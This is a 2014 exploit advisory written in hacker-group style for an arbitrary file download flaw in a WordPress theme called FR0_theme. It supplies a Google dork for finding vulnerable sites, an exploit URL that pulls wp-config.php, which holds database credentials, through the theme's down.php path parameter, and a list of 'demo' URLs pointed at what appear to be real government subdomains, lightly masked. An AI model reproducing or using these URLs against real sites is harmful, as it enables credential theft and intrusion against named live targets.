#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress FR0_theme theme Arbitrary File Download Vulnerability
# Author : alieye
# designer Homepage : http://english.gg.go.kr/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Google Dork: inurl:/themes/FR0_theme/
# Date: 01/09/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can download any file from your target
exploit: http://victim.com/wp-content/themes/FR0_theme/down.php?path=http://victim.com/wp-config.php
Demo:
http://greeXncafe.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://greencafe.gg.go.kr/wp-config.php
http://gvs.Xgg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://gvs.gg.go.kr/wp-config.php
http://farXm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://farm.gg.go.kr/wp-config.php
http://fisXh.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://fish.gg.go.kr/wp-config.php
http://forXest.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://forest.gg.go.kr/wp-config.php
http://nonXgup.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://nongup.gg.go.kr/wp-config.php
http://childfXarm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://childfarm.gg.go.kr/wp-config.php
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++